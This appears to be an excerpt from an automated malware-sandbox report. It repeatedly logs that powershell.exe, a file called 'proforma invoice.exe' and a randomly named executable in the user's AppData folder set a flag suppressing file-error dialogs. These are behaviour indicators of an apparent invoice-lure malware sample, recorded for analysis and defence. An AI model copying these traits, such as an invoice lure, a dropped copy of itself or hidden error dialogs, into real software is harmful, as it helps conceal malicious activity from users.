Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
